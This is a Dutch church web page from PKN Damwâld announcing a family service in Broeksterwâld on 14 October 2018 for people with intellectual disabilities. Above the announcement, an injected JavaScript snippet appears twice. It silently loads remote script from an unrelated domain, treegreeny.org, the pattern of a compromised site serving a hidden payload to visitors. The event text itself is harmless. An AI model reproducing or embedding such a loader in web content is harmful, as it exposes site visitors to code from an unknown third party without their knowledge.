;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Bijzondere gezinsdienst ... Welkom ! - PKN Damwâld
14 oktober 2018
10:00 t/m 11:00
Gereformeerde kerk Broeksterwâld
Bijzondere gezinsdienst … Welkom !

Zondagmorgen 14 oktober 2018 bent u om 10.00 uur van harte welkom in de Gereformeerde kerk in Broeksterwâld  voor een bijzondere gezinsdienst. Ds. A. van Vliet in naar aanleiding van een Bijbelgedeelte uit Markus 4 in op het thema ‘Scheepken onder Jezus hoede’. Gitarist Klaas Steegstra verleent zijn muzikale medewerking aan deze dienst. Van harte welkom !

Geregeld wordt in een aantal kerken in Damwâld en omgeving aangepaste gezinsdiensten gehouden die met name gericht zijn op de mensen met een verstandelijke beperking. Deze diensten, waarvan er gemiddeld 5 per jaar zijn, worden beurtelings verzorgd door één van de kerken die zijn vertegenwoordigd in de Commissie Gezinsdiensten. Deze diensten kenmerken zich door de heldere en zeer begrijpelijk taal en zijn ook uitermate geschikt voor kinderen.

Locatie: Gereformeerde kerk BroeksterwâldFeitsmawei 1 broeksterwâld